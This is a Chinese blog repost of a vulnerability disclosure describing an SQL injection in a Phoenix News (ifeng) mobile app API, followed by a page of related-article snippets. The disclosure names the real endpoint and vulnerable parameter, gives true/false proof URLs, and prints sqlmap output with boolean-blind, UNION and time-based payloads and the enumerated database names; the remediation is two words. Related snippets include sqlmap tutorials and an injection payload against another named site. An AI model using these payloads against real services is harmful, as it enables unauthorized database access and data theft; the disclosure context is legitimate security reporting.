凤凰网php,凤凰网某应用sql注入漏洞_MySQL

最新推荐文章于 2023-04-27 22:26:01 发布
最新推荐文章于 2023-04-27 22:26:01 发布
阅读量235 收藏
点赞数
文章标签: 凤凰网php
该博客揭示了凤凰网新闻手机APP存在SQL注入漏洞,攻击者可以通过修改proid参数进行注入攻击。sqlmap工具确认了MySQL数据库的注入点,并发现了多个数据库名称。修复方案包括参数过滤和使用参数化查询。
摘要由CSDN通过智能技术生成

凤凰网某应用sql注入漏洞

凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。

注入点:http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1,受影响参数:proid

证明:

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '12'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回正常数据

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '22'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回数据异常

sqlmap无压力,貌似凤凰汽车频道的库也在其中,

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:

---

Place: GET

Parameter: proid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: gv=4.2.0&proid=ifengnews' AND 8025=8025 AND 'lqID'='lqID&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: gv=4.2.0&proid=-6406' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7166717471,0x457a716d67506d734978,0x716d696471),NULL,NULL,NULL,NULL,NULL#&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: gv=4.2.0&proid=ifengnews' AND SLEEP(5) AND 'tWlX'='tWlX&os=android_19&screen=720x1206&publishid=2011&zip=1

---

[09:36:11] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

[09:36:11] [INFO] fetching database names

[09:36:11] [INFO] the SQL query used returns 5 entries

[09:36:11] [INFO] retrieved: "information_schema"

[09:36:11] [INFO] retrieved: "auto_ifeng"

[09:36:11] [INFO] retrieved: "auto_ifeng_2"

[09:36:11] [INFO] retrieved: "mobile_ifeng"

[09:36:12] [INFO] retrieved: "test"

available databases [5]:

[*] auto_ifeng

[*] auto_ifeng_2

[*] information_schema

[*] mobile_ifeng

[*] test

修复方案:

过滤,参数化

相关标签:

本文原创发布php中文网,转载请注明出处,感谢您的尊重!

爱吃考拉的小粽子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python凤凰新闻数据分析(一)python爬虫数据爬取
P_的博客
11-19 4727
凤凰网热点新闻 查看网页源代码,发现每个排行的数据在标签<div class="boxTab clearfix">中,共五个div标签 import requests from bs4 import BeautifulSoup url = 'http://news.ifeng.com/hotnews/' req = requests.get(url) html = req.c...
Postgresql 备份与还原
weixin_34112181的博客
10-06 157
pg_dump is an effective tool to backup postgres database. It creates a *.sql file with CREATE TABLE, ALTER TABLE, and COPY SQL statements of source database. To restore these dumps psql command is eno...
sqlmap工具使用
m0_62092622的博客
02-24 811
下载就不说了,尤其要提的是Kali不用下载哦 下面是一些常用命令: Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbos...
mysql文件上传漏洞_智行车SQL注入漏洞+后台任意文件上传(已Getshell)
weixin_36251174的博客
02-02 716
---Parameter: #1* (URI)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND 3677=3677 AND "VuZD" L...
作业3:使用 sqlmap 获取数据库信息
diligent_lee的博客
07-20 4404
作业三 1. 环境准备 在安装好 Python 的环境下运行以下命令安装 sqlmap: pip install sqlmap 安装 Python3 中用于连接 MySQL 服务器的一个库: pip install pymysql sqlmap 直连数据库测试: sqlmap -d mysql://root:cugjsj123@localhost:3306/login -f --banner 参数解释如下: -d:直连数据库,后面跟着连接信息。mysql://用户名:密码@主机名:
CmsEasy crossall_act.php SQL注入漏洞.md
最新发布
04-08
CmsEasy crossall_act.php SQL注入漏洞.md
php is_numberic函数造成的SQL注入漏洞
01-21
一、is_numberic函数简介国内一部分CMS程序里面有用到过is_numberic函数,我们先看看这个函数的结构bool is_numeric (mixed $var)如果 ... //是 values($s) 不是values(‘$s’)mysql_query($sql);上面这个片段程序是判
phpsql注入漏洞示例 sql注入漏洞修复
12-18
以下是一些关于PHPSQL注入漏洞及其修复方法的详细解释。 1. **SQL注入原理**: SQL注入的基本步骤包括: a) 找到注入点,通常是用户输入数据会被直接拼接到SQL查询中的地方,如登录界面、搜索框。 b) 构造恶意...
php168sql注入漏洞
08-15
通过上述分析可以看出,PHP168中的SQL注入漏洞是一个典型的Web应用安全问题,其背后反映了开发者对于用户输入验证不足的问题。为了防止类似漏洞的发生,开发人员应该加强输入验证和过滤机制的设计,同时定期进行安全...
xycms add_ad.php sql注入漏洞1
08-03
标题“xycms add_ad.php sql注入漏洞1”指出的是XYCMS企业建站系统中一个特定页面add_ad.php存在的SQL注入安全问题。XYCMS是一个PHP开发的网站内容管理系统,它分为动态版和静态版,主要服务于企业建站需求。在描述...
CTFHub SQl注入 时间盲注(sqlmap)
赤城封雪的博客
08-07 5076
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
《小迪安全》第15天 SQL注入:Oracle,MongoDB等注入
m0_56250796的博客
04-27 647
Access是非关系型数据库,直接保存在网站源码下(后缀.mdb),A网站的数据库直接保存在A网站源码目录下,B网站数据库直接保存在B网站源码目录下,互不相干。NoSQLAttack 是一个用python编写的开源的攻击工具,用来暴露网络中默认配置mongoDB的IP并且下载目标mongoDB的数据,同时还可以针对以mongoDB为后台存储的应用进行注入攻击。Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb以键值对形式进行查询。
sql注入漏洞--sqlmap使用
qq_43710889的博客
06-16 2548
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
Kali Linux渗透测试 093 自动注入-Sqlmap
kevinhanser
09-17 7827
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. Sqlmap 简介 2. Target 3. Requests 4.Optization(优化) 5. injection 6. detection 7. techniques 8. fingerprint(指纹
kali使用mysql注入攻击_kali之sql注入
weixin_30588381的博客
01-18 1683
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的的操作系统...
[SQL 注入] 墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)
Tiantangbujimo7的博客
01-04 863
SQL注入学习初次尝试SQL注入SQLmap一把梭 查找sql注入漏洞位置 发现红框地方有SQL 注入漏洞 初次尝试SQL注入 开整 其实是为了测试 1’and 1=1# '; http://靶场IP:端口/new_list.php?id=tingjigonggao%201%27and%201=1#%20' 看到这边我直接懵逼了,为什么加上 '# 过滤都不可以了,查阅资料后发现还有其它注释样式: #、 --+、 --%20、 %23 1.开始漏洞检测: http://靶场IP:端口/new_li
mysql 登录框注入_sqlmap之(六)----POST登陆框注入实战
weixin_30698775的博客
01-19 659
利用sqlmap进行POST注入,常见的有三种方法:注入方式一:1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下2.列数据库:sqlmap.py-r"c:\Users\fendo\Desktop\post.txt"-pn--dbs注:-r表示加载一个文件,-p指定参数其中出现了三次提示:it looks like the back-end D...
关于information_schema数据库
大道至简,知易行难
12-13 1473
简要介绍information_schema表
解决导入MySQL数据库提示“Unknown character set: ‘utf8mb4‘“错误
热门推荐
lxw1844912514的博客
08-30 1万+
今天老左在准备迁移公司一个客户的网站到另外一台服务器中,根据正常的操作备份最新的网页文件和导出数据库,然后在新服务器中创建站点和数据库wget迁移进去解压。因为数据库比较小,所以直接用PHPMyAdmin工具在线导入,但是看到有错误提示"#1115 - Unknown character set: 'utf8mb4'"。 第一、错误提示 看来是因为数据库版本的问题...
PHP代码审计:SQL注入漏洞分析
本文主要探讨了PHP环境中SQL注入的防范,特别是针对MySQL数据库。 首先,我们来看【普通注入SQL参数拼接,未做任何过滤】的情况。当开发者直接将用户输入的参数与SQL语句拼接时,如果没有进行任何过滤或转义处理,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值